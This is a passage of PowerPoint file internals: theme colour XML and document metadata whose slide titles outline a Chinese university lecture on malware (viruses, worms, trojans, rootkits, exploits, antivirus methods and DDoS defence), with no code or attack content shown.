        <a:hlink>
          <a:srgbClr val="FFFFCC"/>
        </a:hlink>
        <a:folHlink>
          <a:srgbClr val="CC9900"/>
        </a:folHlink>
      </a:clrScheme>
      <a:clrMap bg1="dk2" tx1="lt1" bg2="dk1" tx2="lt2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
    </a:extraClrScheme>
    <a:extraClrScheme>
      <a:clrScheme name="Strategic 6">
        <a:dk1>
          <a:srgbClr val="000000"/>
        </a:dk1>
        <a:lt1>
          <a:srgbClr val="EAEAEA"/>
        </a:lt1>
        <a:dk2>
          <a:srgbClr val="996600"/>
        </a:dk2>
        <a:lt2>
          <a:srgbClr val="FFCC99"/>
        </a:lt2>
        <a:accent1>
          <a:srgbClr val="727DE0"/>
        </a:accent1>
        <a:accent2>
          <a:srgbClr val="D54F41"/>
        </a:accent2>
        <a:accent3>
          <a:srgbClr val="CAB8AA"/>
        </a:accent3>
        <a:accent4>
          <a:srgbClr val="C8C8C8"/>
        </a:accent4>
        <a:accent5>
          <a:srgbClr val="BCBFED"/>
        </a:accent5>
        <a:accent6>
          <a:srgbClr val="C1473A"/>
        </a:accent6>
        <a:hlink>
          <a:srgbClr val="99CCFF"/>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4E3B30"/>
    </a:dk2>
    <a:lt2>
      <a:srgbClr val="FBEEC9"/>
    </a:lt2>
    <a:accent1>
      <a:srgbClr val="F0A22E"/>
    </a:accent1>
    <a:accent2>
      <a:srgbClr val="A5644E"/>
    </a:accent2>
    <a:accent3>
      <a:srgbClr val="FFFFFF"/>
    </a:accent3>
    <a:accent4>
      <a:srgbClr val="000000"/>
    </a:accent4>
    <a:accent5>
      <a:srgbClr val="F6CEAD"/>
    </a:accent5>
    <a:accent6>
      <a:srgbClr val="955A46"/>
    </a:accent6>
    <a:hlink>
      <a:srgbClr val="AD1F1F"/>
    </a:hlink>
    <a:folHlink>
      <a:srgbClr val="FFC42F"/>
    </a:folHlink>
  </a:clrScheme>
</a:themeOverride>
</file>

<file path=ppt/theme/themeOverride2.xml><?xml version="1.0" encoding="utf-8"?>
<a:themeOverride xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
  <a:clrScheme name="">
    <a:dk1>
      <a:srgbClr val="000000"/>
    </a:dk1>
    <a:lt1>
      <a:srgbClr val="FFFFFF"/>
    </a:lt1>
    <a:dk2>
      <a:srgbClr val="4E3B30"/>
    </a:dk2>
    <a:lt2>
      <a:srgbClr val="FBEEC9"/>
    </a:lt2>
    <a:accent1>
      <a:srgbClr val="F0A22E"/>
    </a:accent1>
    <a:accent2>
      <a:srgbClr val="A5644E"/>
    </a:accent2>
    <a:accent3>
      <a:srgbClr val="FFFFFF"/>
    </a:accent3>
    <a:accent4>
      <a:srgbClr val="000000"/>
    </a:accent4>
    <a:accent5>
      <a:srgbClr val="F6CEAD"/>
    </a:accent5>
    <a:accent6>
      <a:srgbClr val="955A46"/>
    </a:accent6>
    <a:hlink>
      <a:srgbClr val="AD1F1F"/>
    </a:hlink>
    <a:folHlink>
      <a:srgbClr val="FFC42F"/>
    </a:folHlink>
  </a:clrScheme>
</a:themeOverride>
</file>

<file path=ppt/theme/themeOverride3.xml><?xml version="1.0" encoding="utf-8"?>
<a:themeOverride xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
  <a:clrScheme name="">
    <a:dk1>
      <a:srgbClr val="000000"/>
    </a:dk1>
    <a:lt1>
      <a:srgbClr val="FFFFFF"/>
    </a:lt1>
    <a:dk2>
      <a:srgbClr val="4E3B30"/>
    </a:dk2>
    <a:lt2>
      <a:srgbClr val="FBEEC9"/>
    </a:lt2>
    <a:accent1>
      <a:srgbClr val="F0A22E"/>
    </a:accent1>
    <a:accent2>
      <a:srgbClr val="A5644E"/>
    </a:accent2>
    <a:accent3>
      <a:srgbClr val="FFFFFF"/>
    </a:accent3>
    <a:accent4>
      <a:srgbClr val="000000"/>
    </a:accent4>
    <a:accent5>
      <a:srgbClr val="F6CEAD"/>
    </a:accent5>
    <a:accent6>
      <a:srgbClr val="955A46"/>
    </a:accent6>
    <a:hlink>
      <a:srgbClr val="AD1F1F"/>
    </a:hlink>
    <a:folHlink>
      <a:srgbClr val="FFC42F"/>
    </a:folHlink>
  </a:clrScheme>
</a:themeOverride>
</file>

<file path=ppt/theme/themeOverride4.xml><?xml version="1.0" encoding="utf-8"?>
<a:themeOverride xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
  <a:clrScheme name="">
    <a:dk1>
      <a:srgbClr val="000000"/>
    </a:dk1>
    <a:lt1>
      <a:srgbClr val="FFFFFF"/>
    </a:lt1>
    <a:dk2>
      <a:srgbClr val="4E3B30"/>
    </a:dk2>
    <a:lt2>
      <a:srgbClr val="FBEEC9"/>
    </a:lt2>
    <a:accent1>
      <a:srgbClr val="F0A22E"/>
    </a:accent1>
    <a:accent2>
      <a:srgbClr val="A5644E"/>
    </a:accent2>
    <a:accent3>
      <a:srgbClr val="FFFFFF"/>
    </a:accent3>
    <a:accent4>
      <a:srgbClr val="000000"/>
    </a:accent4>
    <a:accent5>
      <a:srgbClr val="F6CEAD"/>
    </a:accent5>
    <a:accent6>
      <a:srgbClr val="955A46"/>
    </a:accent6>
    <a:hlink>
      <a:srgbClr val="AD1F1F"/>
    </a:hlink>
    <a:folHlink>
      <a:srgbClr val="FFC42F"/>
    </a:folHlink>
  </a:clrScheme>
</a:themeOverride>
</file>

<file path=docProps/app.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes">
  <Template/>
  <TotalTime>5229</TotalTime>
  <Words>9341</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>全屏显示(4:3)</PresentationFormat>
  <Paragraphs>988</Paragraphs>
  <Slides>149</Slides>
  <Notes>53</Notes>
  <HiddenSlides>38</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149</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="170" baseType="lpstr">
      <vt:lpstr>Helvetica Neue</vt:lpstr>
      <vt:lpstr>PingFang SC</vt:lpstr>
      <vt:lpstr>黑体</vt:lpstr>
      <vt:lpstr>华文楷体</vt:lpstr>
      <vt:lpstr>华文中宋</vt:lpstr>
      <vt:lpstr>隶书</vt:lpstr>
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Century Gothic</vt:lpstr>
      <vt:lpstr>Franklin Gothic Book</vt:lpstr>
      <vt:lpstr>Tahoma</vt:lpstr>
      <vt:lpstr>Times</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Verdana</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Wingdings 2</vt:lpstr>
      <vt:lpstr>Strategic</vt:lpstr>
      <vt:lpstr>Office 主题</vt:lpstr>
      <vt:lpstr>Visio</vt:lpstr>
      <vt:lpstr>第十章：恶意软件 </vt:lpstr>
      <vt:lpstr>教学目标</vt:lpstr>
      <vt:lpstr>江苏“温柔”木马案</vt:lpstr>
      <vt:lpstr>江苏“温柔”木马案</vt:lpstr>
      <vt:lpstr>江苏“温柔”木马案</vt:lpstr>
      <vt:lpstr>中华人民共和国刑法</vt:lpstr>
      <vt:lpstr>中华人民共和国刑法</vt:lpstr>
      <vt:lpstr>中华人民共和国刑法</vt:lpstr>
      <vt:lpstr>中华人民共和国刑法</vt:lpstr>
      <vt:lpstr>本讲提纲</vt:lpstr>
      <vt:lpstr>2.1恶意代码的定义</vt:lpstr>
      <vt:lpstr>恶意代码示例</vt:lpstr>
      <vt:lpstr>2.2恶意代码（软件）的分类</vt:lpstr>
      <vt:lpstr>2.2.1 （狭义）计算机病毒</vt:lpstr>
      <vt:lpstr>2.2.1 计算机病毒</vt:lpstr>
      <vt:lpstr>2.2.1 计算机病毒</vt:lpstr>
      <vt:lpstr>1.典型病毒案例</vt:lpstr>
      <vt:lpstr>CIH介绍</vt:lpstr>
      <vt:lpstr>“美丽莎” 介绍</vt:lpstr>
      <vt:lpstr>爱虫病毒介绍</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>Windows下的病毒</vt:lpstr>
      <vt:lpstr>(1)宏病毒</vt:lpstr>
      <vt:lpstr>什么是宏？</vt:lpstr>
      <vt:lpstr>宏语言</vt:lpstr>
      <vt:lpstr>宏病毒示例</vt:lpstr>
      <vt:lpstr>宏病毒示例</vt:lpstr>
      <vt:lpstr>一、模板文件格式： .dot文档：模板文档，新文档继承模板的属性（ 宏、菜单、格式等）。   Normal.dot文件：全局模板，在建立整个文档中所起的作用是作为一个基类，是新建文档默认的模板。 </vt:lpstr>
      <vt:lpstr>(2) VBS脚本病毒</vt:lpstr>
      <vt:lpstr>VBS脚本语言</vt:lpstr>
      <vt:lpstr>VBS脚本语言-小程序</vt:lpstr>
      <vt:lpstr>VBS脚本病毒如何感染</vt:lpstr>
      <vt:lpstr>VBS脚本病毒如何感染文件</vt:lpstr>
      <vt:lpstr>VBS脚本病毒如何搜索目标</vt:lpstr>
      <vt:lpstr>VBS脚本病毒例子</vt:lpstr>
      <vt:lpstr>VBS脚本病毒例子</vt:lpstr>
      <vt:lpstr>VBS脚本病毒例子</vt:lpstr>
      <vt:lpstr>(3)Win32 PE病毒</vt:lpstr>
      <vt:lpstr>PE文件格式一览 </vt:lpstr>
      <vt:lpstr>传统感染型-感染思路</vt:lpstr>
      <vt:lpstr>一个实际的感染例子演示</vt:lpstr>
      <vt:lpstr>一个实际的感染例子演示</vt:lpstr>
      <vt:lpstr>一个实际的感染例子演示</vt:lpstr>
      <vt:lpstr>一个实际的感染例子演示</vt:lpstr>
      <vt:lpstr>一个实际的感染例子演示</vt:lpstr>
      <vt:lpstr>一个实际的感染例子演示</vt:lpstr>
      <vt:lpstr>一个实际的感染例子演示</vt:lpstr>
      <vt:lpstr>一个实际的感染例子演示</vt:lpstr>
      <vt:lpstr>感染释放型-感染思路</vt:lpstr>
      <vt:lpstr>感染释放型-感染思路</vt:lpstr>
      <vt:lpstr>感染释放型-感染思路</vt:lpstr>
      <vt:lpstr>目前流行的非感染型“病毒”</vt:lpstr>
      <vt:lpstr>覆盖型</vt:lpstr>
      <vt:lpstr>覆盖型-小浩病毒</vt:lpstr>
      <vt:lpstr>覆盖型-小浩病毒</vt:lpstr>
      <vt:lpstr>覆盖型-小浩病毒</vt:lpstr>
      <vt:lpstr>覆盖型-小浩病毒</vt:lpstr>
      <vt:lpstr>2.2.2 网络蠕虫</vt:lpstr>
      <vt:lpstr>恶意代码自动运行机制</vt:lpstr>
      <vt:lpstr>恶意代码自动运行机制</vt:lpstr>
      <vt:lpstr>2003年以来的重大蠕虫</vt:lpstr>
      <vt:lpstr>Stuxnet</vt:lpstr>
      <vt:lpstr>传播方式</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>Stuxnet的特点</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>蠕虫王（slammer）的传播速度</vt:lpstr>
      <vt:lpstr>病毒和蠕虫的区别</vt:lpstr>
      <vt:lpstr>2.2.3木马</vt:lpstr>
      <vt:lpstr>伪装代码示例</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>2.2.4 后门</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>2.2.5 僵尸</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>2.2.6 Rootkit</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>RootKit入侵之后的系统查询过程</vt:lpstr>
      <vt:lpstr>2.2.7间谍软件</vt:lpstr>
      <vt:lpstr>2.2.8 广告软件</vt:lpstr>
      <vt:lpstr>2.2.9流氓软件</vt:lpstr>
      <vt:lpstr>2.2.10 Exploit</vt:lpstr>
      <vt:lpstr>2.2.10 Exploit</vt:lpstr>
      <vt:lpstr>2.2.10 Exploit</vt:lpstr>
      <vt:lpstr>2.2.10 Exploit</vt:lpstr>
      <vt:lpstr>开启一个远程后门并获得命令行的shellcode</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>2.2.11 黑客工具等</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>2.3 计算机病毒的典型破坏功能</vt:lpstr>
      <vt:lpstr>2.3.1目前病毒程序常见的功能</vt:lpstr>
      <vt:lpstr>目前病毒程序常见的功能（续）</vt:lpstr>
      <vt:lpstr>2.4恶意代码传播途径与病毒产业链</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>2.5恶意代码的完整生命周期及防护手段</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>2.5.1. 杀毒软件的基本原理</vt:lpstr>
      <vt:lpstr>2.5.1. 杀毒软件的基本原理</vt:lpstr>
      <vt:lpstr>2.5.2. 杀毒软件的监控位置</vt:lpstr>
      <vt:lpstr>2.5.3.杀毒软件的基本功能</vt:lpstr>
      <vt:lpstr>2.5.4. 核心模块－病毒扫描引擎</vt:lpstr>
      <vt:lpstr>特征码识别法－机制 </vt:lpstr>
      <vt:lpstr>特征码识别法－特征码</vt:lpstr>
      <vt:lpstr>特征码示例</vt:lpstr>
      <vt:lpstr>特征码示例</vt:lpstr>
      <vt:lpstr>特征码识别法－优点</vt:lpstr>
      <vt:lpstr>特征码识别法－缺点</vt:lpstr>
      <vt:lpstr>全盘扫描－文件校验和法 </vt:lpstr>
      <vt:lpstr>全盘扫描－文件校验和法 </vt:lpstr>
      <vt:lpstr>进程行为监测法－机制 </vt:lpstr>
      <vt:lpstr>进程行为监测法</vt:lpstr>
      <vt:lpstr>进程行为监测法－优缺点</vt:lpstr>
      <vt:lpstr>主动防御技术</vt:lpstr>
      <vt:lpstr>主动防御技术：规则示例</vt:lpstr>
      <vt:lpstr>主动防御技术</vt:lpstr>
      <vt:lpstr>主动防御技术</vt:lpstr>
      <vt:lpstr>2.6 DOS / DDOS 攻击</vt:lpstr>
      <vt:lpstr>一个DDoS攻击过程</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>Botnet</vt:lpstr>
      <vt:lpstr>DDoS攻击发展趋势</vt:lpstr>
      <vt:lpstr>DoS攻击的本质</vt:lpstr>
      <vt:lpstr>DoS/DDoS类型的划分</vt:lpstr>
      <vt:lpstr>DoS/DDoS攻击演变</vt:lpstr>
      <vt:lpstr>DDoS攻击介绍——SYN Flood</vt:lpstr>
      <vt:lpstr>DDoS攻击介绍——ACK Flood</vt:lpstr>
      <vt:lpstr>DDoS攻击介绍——Connection Flood</vt:lpstr>
      <vt:lpstr>DDoS攻击介绍——HTTP Get Flood</vt:lpstr>
      <vt:lpstr>DRDOS（分布式反射拒绝服务）</vt:lpstr>
      <vt:lpstr>DRDOS（分布式反射拒绝服务）</vt:lpstr>
      <vt:lpstr> 被DDoS攻击时的现象</vt:lpstr>
      <vt:lpstr>预防为主的DDoS应付方法</vt:lpstr>
      <vt:lpstr>预防为主的DDoS应付方法</vt:lpstr>
      <vt:lpstr>DDoS攻击例子</vt:lpstr>
      <vt:lpstr>DDoS防御例子</vt:lpstr>
      <vt:lpstr>DDoS防御例子</vt:lpstr>
      <vt:lpstr>DDoS防御例子</vt:lpstr>
      <vt:lpstr>DDoS防御例子</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>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信息安全概论</dc:title>
  <dc:creator>pigj</dc:creator>
  <cp:lastModifiedBy>He Gaofeng</cp:lastModifiedBy>
  <cp:revision>965</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2005-09-11T15:46:20Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-05-25T08:05:58Z</dcterms:modified>
</cp:coreProperties>
</file>